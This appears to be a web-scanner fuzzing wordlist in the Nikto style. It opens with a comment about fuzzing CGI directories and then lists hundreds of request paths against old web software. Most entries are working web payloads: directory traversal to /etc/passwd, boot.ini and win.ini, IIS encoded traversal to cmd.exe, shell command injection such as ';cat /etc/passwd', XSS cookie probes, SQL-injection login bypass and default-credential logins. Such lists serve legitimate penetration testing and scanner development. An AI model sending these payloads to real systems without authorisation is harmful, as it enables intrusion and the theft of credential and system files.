# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi 14all-1.1.cgi?cfg=../../../../../../../../etc/passwd 14all.cgi?cfg=../../../../../../../../etc/passwd 666%0a%0a666.jsp 852566C90012664F .aspx .jsp .shtm .shtml .stm .thtml ?D=A ?M=A ?N=D ?Open ?OpenServer ?PageServices ?S=A ?\"> ?mod=&op=browse ?mod=node&nid=some_thing&op=view ?mod=some_thing&op=browse ?pattern=/etc/*&sort=name ?sql_debug=1 ?wp-cs-dump ADMINconfig.php ASP/cart/database/metacart.mdb AT-admin.cgi AT-generate.cgi Admin/ Admin_files/ Admin_files/order.log Administration/ Agent/ Agentes/ Agents/ Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 AnyBoard.cgi AnyForm AnyForm2 Asp/ BACLIENT Backup/add-passwd.cgi C CFIDE/administrator/index.cfm CFIDE/probe.cfm COM CSMailto.cgi CSMailto/CSMailto.cgi CSNews.cgi CVS/Entries Cgitest.exe Citrix/ICAWEB/ Citrix/MetaFrameXP/default/login.asp Citrix/PNAgent/ Config1.htm Count.cgi DB4Web/10.10.10.10:100 DC DCFORM DCFORMS98.CGI DCShop/auth_data/auth_user_file.txt DCShop/orders/orders.txt DEASAppDesign.nsf DEASLog.nsf DEASLog01.nsf DEASLog02.nsf DEASLog03.nsf DEASLog04.nsf DEASLog05.nsf DEESAdmin.nsf DMR/ Data/settings.xml+ DomainFiles/*//../../../../../../../../../../etc/passwd EXE/ Excel/ File FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd FileSeek.cgi?head=&foot=;cat%20/etc/passwd FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= FileSeek.cgi?head=;cat%20/etc/passwd|&foot= FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd FileSeek2.cgi?head=&foot=;cat%20/etc/passwd FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= FileSeek2.cgi?head=;cat%20/etc/passwd|&foot= FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com FormMail.cgi? modules/Search/index.php modules/Submit/index.php?op=pre&title= modules/WebChat/in.php+ modules/WebChat/out.php modules/WebChat/quit.php modules/WebChat/users.php modules/Your_Account/navbar.php+ moin.cgi?test mojo/mojo.cgi moregroupware/modules/webmail2/inc/ movimientos/ mp3/ mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb mqseries/ mrtg.cfg?cfg=../../../../../../../../etc/passwd mrtg.cgi?cfg=../../../../../../../../etc/passwd mrtg.cgi?cfg=blah ms_proxy_auth_query/ msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini msadc/msadcs.dll msadc/samples/adctest.asp msadm/domain/index.php3?account_name=\"> msadm/site/index.php3?authid=\"> msadm/user/login.php3?account_name=\"> msdwda.nsf mspress30/ msql/ msword/ mt-static/ mt-static/mt-check.cgi mt-static/mt-load.cgi mt-static/mt.cfg mt/ mt/mt-check.cgi mt/mt-load.cgi mt/mt.cfg mtatbls.nsf mtdata/mtstore.nsf mtstore.nsf multihtml.pl?multi=/etc/passwd%00html musicqueue.cgi myguestBk/add1.asp?|-|0|404_Object_Not_Found myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found myguestBk/admin/index.asp?|-|0|404_Object_Not_Found myguestbook.cgi?action=view myhome.php?action=messages&box= myinvoicer/config.inc mylog.html?screen=/etc/passwd mylog.phtml?screen=/etc/passwd myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc na_admin/ na_admin/ataglance.html namazu.cgi names.nsf nav/cList.php?root= netutils/findata.stm?user= netutils/ipdata.stm?ipaddr= netutils/whodata.stm?sitename= new new/ news news/news.mdb newsdesk.cgi?t=../../../../../../../../../../etc newsdesk.cgi?t=../../../../../../../../../../etc/passwd newtopic.php newuser?Image=../../database/rbsserv.mdb nikto.ida nimages.php nl/ nlog-smb.cgi nlog-smb.pl nntp/nd000000.nsf nntp/nd000001.nsf nntp/nd000002.nsf nntp/nd000003.nsf nntp/nd000004.nsf nntppost.nsf node/view/666\"> non-existent.pl noshell nosuchurl/> notes.nsf noticias/ nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00 nph-error.pl nph-exploitscanget.cgi nph-maillist.pl nph-publish nph-publish.cgi nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 nph-test-cgi nphp/nphpd.php npn_admn.nsf npn_rn.nsf ns-icons/ nsn/..%5Cutil/attrib.bas nsn/..%5Cutil/chkvol.bas nsn/..%5Cutil/copy.bas nsn/..%5Cutil/del.bas nsn/..%5Cutil/dir.bas nsn/..%5Cutil/dsbrowse.bas nsn/..%5Cutil/glist.bas nsn/..%5Cutil/lancard.bas nsn/..%5Cutil/md.bas nsn/..%5Cutil/rd.bas nsn/..%5Cutil/ren.bas nsn/..%5Cutil/send.bas nsn/..%5Cutil/set.bas nsn/..%5Cutil/slist.bas nsn/..%5Cutil/type.bas nsn/..%5Cutil/userlist.bas nsn/..%5Cweb/env.bas nsn/..%5Cweb/fdir.bas nsn/..%5Cwebdemo/env.bas nsn/..%5Cwebdemo/fdir.bas nsn/env.bas nsn/fdir.bas nsn/fdir.bas:ShowVolume ntitar.pl ntsync4.nsf ntsync45.nsf nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid nul..cfm nul..dbm nul.cfm nul.dbm null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full oc/Search/SQLQHit.asp oc/Search/sqlqhit.asp odbc/ oekaki/ oem_webstage/cgi-bin/oemapp_cgi oem_webstage/oem.conf officescan/cgi/cgiChkMasterPwd.exe officescan/cgi/jdkRqNotify.exe officescan/hotdownload/ofscan.ini ojspdemos/basic/hellouser/hellouser.jsp ojspdemos/basic/simple/usebean.jsp ojspdemos/basic/simple/welcomeuser.jsp old/ open? openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> openautoclassifieds/friendmail.php?listing= opendir.php?/etc/passwd opendir.php?requesturl=/etc/passwd oprocmgr-status options.inc.php+ options.php?optpage= oracle oradata/ order/ order/order_log.dat order/order_log_v12.dat orders/ orders/checks.txt orders/mountain.cfg orders/order_log.dat orders/order_log_v12.dat orders/orders.log orders/orders.txt oscommerce/default.php outgoing/ owa_util%2esignature ows-bin/oaskill.exe?abcde.exe ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah ows-bin/perlidlc.bat?&dir ows/ ows/restricted%2eshow pafiledb/includes/team/file.php page.cgi?../../../../../../../../../../etc/passwd pagelog.cgi pages/ pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E pals-cgi?palsAction=restart&documentName=/etc/passwd parse-file parse_xml.cgi pass pass_done.php passwd passwd.adjunct passwd.txt passwdfile password password.inc password/ passwords.txt passwords/ path/nw/article.php?id=' pbcgi.cgi?name=Joe%Camel&email=%3C pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir pbserver/pbserver.dll pccsmysqladm/incs/dbconnect.inc pdf/ people.list perl perl-status perl.exe perl.exe?-v perl/ perl/-e%20%22system('cat%20/etc/passwd');\%22 perl/-e%20print%20Hello perl/env.pl perl/files.pl perl/printenv perl/samples/env.pl perl/samples/lancgi.pl perl/samples/ndslogin.pl perl/samples/volscgi.pl perl5/ perl5/files.pl perl?-v perlshop.cgi perweb.nsf pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' pfdispaly.cgi?../../../../../../../../../../etc pfdispaly.cgi?../../../../../../../../../../etc/passwd pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 phf phf.cgi?QALIA phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd phf?Qname=root%0Acat%20/etc/passwd%20 phorum/admin/footer.php?GLOBALS[message]= phorum/admin/header.php?GLOBALS[message]= phorum/admin/stats.php photo/ photo/manage.cgi photo/protected/manage.cgi photo_album/apa_phpinclude.inc.php photodata/ photodata/manage.cgi php-cgi php-coolfile/action.php?action=edit&file=config.php php.cgi?/etc/passwd php.ini php/ php/gaestebuch/admin/index.php php/index.php php/mlog.html php/mlog.phtml php/mylog.html?screen=/etc/passwd php/mylog.phtml?screen=/etc/passwd php/php.exe?c:\boot.ini php/php.exe?c:\winnt\boot.ini php/php4ts.dll phpBB/phpinfo.php phpBB/viewtopic.php?t=17071&highlight=\">\" phpBB/viewtopic.php?topic_id= phpBB2/includes/db.php phpBB2/search.php?search_id=1\ phpEventCalendar/file_upload.php phpMyAdmin/ phpclassifieds/latestwap.php?url= phpimageview.php?pic=javascript:alert('Vulnerable') phpinfo.php phpinfo.php3 phpinfo.php3?VARIABLE= phpinfo.php?GLOBALS[test]= phpinfo.php?VARIABLE= phpinfo.php?cx[]=JUNK(4096) phpmyadmin/ phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid phpping/index.php?pingto=www.test.com%20|%20dir%20c:\ phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E phprocketaddin/?page=../../../../../../../../../../boot.ini phprocketaddin/?page=../../../../../../../../../../etc/passwd phpshare/phpshare.php phptonuke.php?filnavn=/etc/passwd phptonuke.php?filnavn= phpwebchat/register.php?register=yes&username=OverG&email=&email1= phpwebfilemgr/index.php?f=../../../../../../../../../etc phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"> phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"> phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\">&MMN_position=[X:X] phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"> pics/ piranha/secure/passwd.php3 pix/ pks/lookup pls/admin pls/dadname/htp.print?cbuf= pls/help/ pls/ldc/admin_/ pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT pls/portal/HTP.PRINT pls/portal/PORTAL.home pls/portal/PORTAL.wwa_app_module.link pls/portal/PORTAL.wwv_dynxml_generator.show pls/portal/PORTAL.wwv_form.genpopuplist pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO pls/portal/PORTAL.wwv_setting.render_css pls/portal/PORTAL.wwv_ui_lovf.show pls/portal/PORTAL_DEMO.ORG_CHART.SHOW pls/portal/SELECT pls/portal/null pls/portal/owa_util.cellsprint?p_theQuery=select pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users pls/portal/owa_util.listprint?p_theQuery=select pls/portal/owa_util.show_query_columns?ctable=sys.dba_users pls/portal/owa_util.showsource?cname=owa_util pls/portal/owa_util.signature pls/portal30/admin_/ pls/sample/admin_/help/..%255cplsql.conf pls/simpledad/admin_/ pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E pls/simpledad/admin_/dadentries.htm pls/simpledad/admin_/gateway.htm?schema=sample pls/simpledad/admin_/globalsettings.htm plusmail pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit pm/lib.inc.php pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1 pmlite.php pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello poll pollit/Poll_It_ pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00 polls pollssi.cgi poppassd.php3+ porn/ post-query post16.exe post32.exe|dir%20c:\\ post_query postcards.cgi postinfo.html postnuke/html/index.php?module=My_eGallery postnuke/html/modules.php?op=modload&name=News&file=article&sid= postnuke/index.php?module=My_eGallery postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd powerup/r.cgi?FILE=../../../../../../../../../../passwd pp.php?action=login ppdscgi.exe pr0n/ prd.i/pgen/ printenv printenv.tmp privado/ private.nsf private/ probecontrol.cgi?command=enable&username=cancer&password=killer processit.pl prod/ produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found product_info.php productcart/database/EIPC.mdb productcart/pc/Custva.asp?|-|0|404_Object_Not_Found profile.cgi profile.php?u=JUNK(8) profiles.php?uid=<script>alert(document.cookie)</script> profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> project/index.php?m=projects&user_cookie=1 prometheus-all/index.php pron/ proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\" protected/ protected/secret.html+ protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' protection.php proxy/ssllogin?user=administrator&password=administrator proxy/ssllogin?user=administrator&password=operator proxy/ssllogin?user=administrator&password=user prueba/ pruebas/ prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini pt_config.inc ptg_upgrade_pkg.log pu3.pl pub/ pub/english.cgi?op=rmail public.nsf public/ publica/ publicar/ publico/ publisher/ publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 purchase/ purchases/ put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20 pvote/ch_info.php?newpass=password&confirm=password%20 pvote/del.php?pollorder=1%20 pw/ pw/storemgr.pw pwd.db python/ qpadmin.nsf query query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini query?mss=%2e%2e/config quickplace/quickplace/main.nsf quickstart/qstart50.nsf quickstart/wwsample.nsf quickstore.cgi?page=../../../../../../../../../../etc quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= quikmail/nph-emumail.cgi?type=../%00 quikstore.cfg quikstore.cgi quizme.cgi r.cgi?FILE=../../../../../../../../../../etc r.cgi?FILE=../../../../../../../../../../etc/passwd ratlog.cgi reademail.pl readme readme.eml readme.nsf readme.txt readmec.nsf readmes.nsf redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E redirect register.cgi register/ registered/ replicator/webpage.cgi/ replymsg.php?send=1&destin= reports.nsf reports/ reports/rwservlet reports/rwservlet/getjobid4?server=myrep reports/rwservlet/getjobid7?server=myrep reports/rwservlet/showenv reports/rwservlet/showjobs reports/rwservlet/showmap reports/rwservlet/showmap?server=myserver reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF reports/temp/ reseller/ responder.cgi restricted/ retail/ retrieve_password.pl reviews/newpro.cgi rguest.exe rightfax/fuwww.dll/? rksh rmp_query robadmin.cgi robpoll.cgi room/save_item.php root root/ rpc.php?q="> rpc.php?q='&t=' rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir rpm_query rsh rtm.log rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. rwcgi60 rwcgi60/showenv rwwwshell.pl sales/ sam sam._ sam.bin sample/ sample/faqw46 sample/framew46 sample/pagesw46 sample/siregw46 sample/site1w4646 sample/site2w4646 sample/site3w4646 samples/ samples/search.dll?query= samples/search/queryhit.htm save/ sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 sawmill?rfcf+%22 sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 sbcgi/sitebuilder.cgi sca/menu.jsp schema50.nsf scoadminreg.cgi scozbook/view.php?PG=whatever scr/ scratch screen.php script>alert('Vulnerable').cfm scripts scripts/*%0a.pl scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\" scripts/CGImail.exe scripts/Carello/Carello.dll scripts/admin.pl scripts/cfgwiz.exe scripts/contents.htm scripts/convert.bas scripts/counter.exe scripts/cphost.dll scripts/cpshost.dll scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini scripts/fpadmcgi.exe scripts/fpadmin.htm scripts/fpcount.exe scripts/fpremadm.exe scripts/fpsrvadm.exe scripts/httpodbc.dll scripts/iisadmin/bdir.htr scripts/iisadmin/ism.dll scripts/no-such-file.pl scripts/postinfo.asp scripts/proxy/w3proxy.dll scripts/repost.asp scripts/root.exe?/c+dir+c:\+/OG scripts/samples/ctguestb.idc scripts/samples/search/author.idq scripts/samples/search/filesize.idq scripts/samples/search/filetime.idq scripts/samples/search/qfullhit.htw scripts/samples/search/qsumrhit.htw scripts/samples/search/queryhit.idq scripts/samples/search/simple.idq scripts/samples/search/webhits.exe scripts/slxweb.dll/getfile?type=Library&file=[invalid filename] scripts/tools/ctss.idc scripts/tools/dsnform scripts/tools/dsnform.exe scripts/tools/getdrvrs.exe scripts/tools/newdsn.exe scripts/tradecli.dll scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir scripts/weblog scripts/wsisa.dll/WService=anything?WSMadmin se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse search.asp?Search= search.asp?Search=\"><script>alert(Vulnerable)</script> search.asp?term=<%00script>alert('Vulnerable') search.cgi search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini search.php?mailbox=INBOX&what=x&where=&submit=Search search.php?searchfor=\"> search.php?searchstring= search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script> search.php?zoom_query= search.pl search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank= search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank= search.pl?form=../../../../../../../../../../etc search.pl?form=../../../../../../../../../../etc/passwd%00 search.vts search/ search/?SectionIDOverride=1&SearchText= search/SQLQHit.asp search/htx/SQLQHit.asp search/htx/sqlqhit.asp search/inc/ search/index.cfm? search/results.stm?query=<script>alert('vulnerable');</script> search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc search/sqlqhit.asp search97.vts search?NS-query-pat=../../../../../../../../../../etc/passwd search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini secret.nsf secret/ secure/ securecontrolpanel/ secured/ securelogin/1,2345,A,00.html security/web_access.html sell/ sendform.cgi sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message sendphoto.php sendtemp.pl?templ=../../../../../../../../../../etc sendtemp.pl?templ=../../../../../../../../../../etc/passwd sensepost.exe?/c+dir server-info server-status server/ server_stats/ servers/link.cgi service/ services/ servicio/ servicios/ servlet/AdminServlet servlet/ContentServer?pagename= servlet/CookieExample?cookiename= servlet/Counter servlet/DateServlet servlet/FingerServlet servlet/HelloWorldServlet servlet/IsItWorking servlet/MsgPage?action=test&msg= servlet/PrintServlet servlet/SchedulerTransfer servlet/SearchServlet servlet/ServletManager servlet/SessionManager servlet/SessionServlet servlet/SimpleServlet servlet/SnoopServlet servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a servlet/allaire.jrun.ssi.SSIFilter servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter servlet/com.newatlanta.servletexec.JSP10Servlet/ servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa servlet/com.unify.servletexec.UploadServlet servlet/custMsg?guestName= servlet/gwmonitor servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml servlet/org.apache.catalina.ContainerServlet/ servlet/org.apache.catalina.Context/ servlet/org.apache.catalina.Globals/ servlet/org.apache.catalina.servlets.WebdavStatus/ servlet/sq1cdsn servlet/sqlcdsn servlet/sunexamples.BBoardServlet servlet/webacc servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 servlet/webacc?User.html=noexist servlet/webpub servlets/MsgPage?action=badlogin&msg= servlets/SchedulerTransfer servlets/weboam/oam/oamLogin session/adminlogin session/admnlogin setpasswd.cgi settings/site.ini setup.exe?&page=list_users&user=P setup.nsf setup/ setupweb.nsf sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd sgdynamo.exe?HTNAME= sh shop.cgi?page=../../../../../../../etc/passwd shop.pl/page=;cat%20shop.pl| shop/ shop/auth_data/auth_user_file.txt shop/database/metacart.mdb shop/member_html.cgi?file=;cat%20/etc/passwd| shop/member_html.cgi?file=|cat%20/etc/passwd| shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script> shop/normal_html.cgi?file=../../../../../../etc/issue%00 shop/normal_html.cgi?file=;cat%20/etc/passwd| shop/normal_html.cgi?file=|cat%20/etc/passwd| shop/orders/orders.txt shop/php_files/site.config.php+ shop/search.php shop/show.php shopa_sessionlist.asp shopadmin.asp shopadmin.asp?Password=abc&UserName="> shopdbtest.asp shopexd.asp?catalogid='42 shoponline/fpdb/shop.mdb shopper.cgi?newpage=../../../../../../../../../../etc shopper.cgi?newpage=../../../../../../../../../../etc/passwd shopper/ shopping/database/metacart.mdb shopping/diag_dbtest.asp shopping/shopdisplayproducts.asp?id=1&cat= shopping300.mdb shopping400.mdb shoppingdirectory/midicart.mdb shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| shoutbox.php?conf=../../../../../../../etc/passwd shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20 show.pl showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> showcheckins.cgi?person= showcheckins.cgi?person= showmail.pl showmail.pl?Folder= showuser.cgi shtml.dll signon simple/view_page?mv_arg=|cat%20/etc/passwd| simplebbs/users/users.php simplestguest.cgi simplestmail.cgi sips/sipssys/users/a/admin/user site/' site/eg/source.asp site/iissamples/ site_searcher.cgi sitemap.xml siteminder siteminder/smadmin.html siteseed/ siteserver/publishing/viewcode.asp?source=/default.asp smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| smbcfg.nsf smconf.nsf smency.nsf smg_Smxcfg30.exe?vcc=3560121183d3 smhelp.nsf smmsg.nsf smquar.nsf smsolar.nsf smssend.php smtime.nsf smtp.box smtp.nsf smtpibwq.nsf smtpobwq.nsf smtptbls.nsf smvlog.nsf soap/servlet/soaprouter soapConfig.xml soapdocs/ReleaseNotes.html soapdocs/webapps/soap/ soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml software.nsf software/ soinfo.php?\"> sojourn.cgi?cat=../../../../../../../../../../etc sojourn.cgi?cat=../../../../../../../../../../etc/password%00 solaris/ some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 source/ spelling.php3+ spin_client.cgi?aaaaaaaa spwd sql/ sqldump.sql sqlnet.log sqlqhit.asp squirrelmail/src/read_body.php src/ src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0 srchadm srvinst.nsf srvnam.htm srvstatus.chl+ ss ss.cfg ss000007.pl?PRODREF= sscd_suncourier.pl ssdefs/siteseed.dtd ssi/ ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\ staff/ start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E start.php?config=alper.inc.php stat.htm stat.pl stat/ staticpages/index.php statistic/ statistics/ statmail.nsf statrep.nsf stats-bin-p/reports/index.html stats.htm stats.html stats.pl stats.prf stats.txt stats/ stats/statsbrowse.asp?filepath=c:\&Opt=3 stats_old/ statsconfig status.php3 status/ status?full=true statusconfig.pl statview.pl stauths.nsf stautht.nsf stconf.nsf stconfig.nsf stdnaset.nsf stdomino.nsf stlog.nsf store.cgi? store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html store/ store/agora.cgi?cart_id= store/agora.cgi?cart_id= store/agora.cgi?page=whatever33.html store/index.cgi?page=../../../../../../../../etc/passwd story.pl?next=../../../../../../../../../../etc story.pl?next=../../../../../../../../../../etc/passwd%00 story/story.pl?next=../../../../../../../../../../etc/passwd%00 story/story.pl?next=../../../../../../../../../../passwd%00 streg.nsf stronghold-info stronghold-status structure.sql stsrc.nsf style/ styles/ stylesheet/ stylesheets/ subir/ submit.php?subject=&story=&storyext=&op=Preview submit?setoption=q&option=allowed_ips&value=255.255.255.255 sun/ sunshop.index.php?action=storenew&username= super_stats/access_logs super_stats/error_logs support/ support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd support/messages supporter/index.php supporter/index.php?t=ticketfiles&id=<script></script> supporter/index.php?t=tickettime&id=<script></script> supporter/index.php?t=updateticketlog&id=<script></script> supporter/tupdate.php surf/scwebusers survey survey.cgi sw000.asp?|-|0|404_Object_Not_Found swf sws/admin.html sws/manager.pl sys/ syshelp/cscript/showfnc.stm?pkg= syshelp/cscript/showfncs.stm?pkg= syshelp/cscript/showfunc.stm?func= syshelp/stmex.stm?foo=123&bar= syshelp/stmex.stm?foo= syslog.htm?%20 system/ sysuser/docmgr/create.stm?path= sysuser/docmgr/edit.stm?name= sysuser/docmgr/edit.stm?path= sysuser/docmgr/ftp.stm?path= 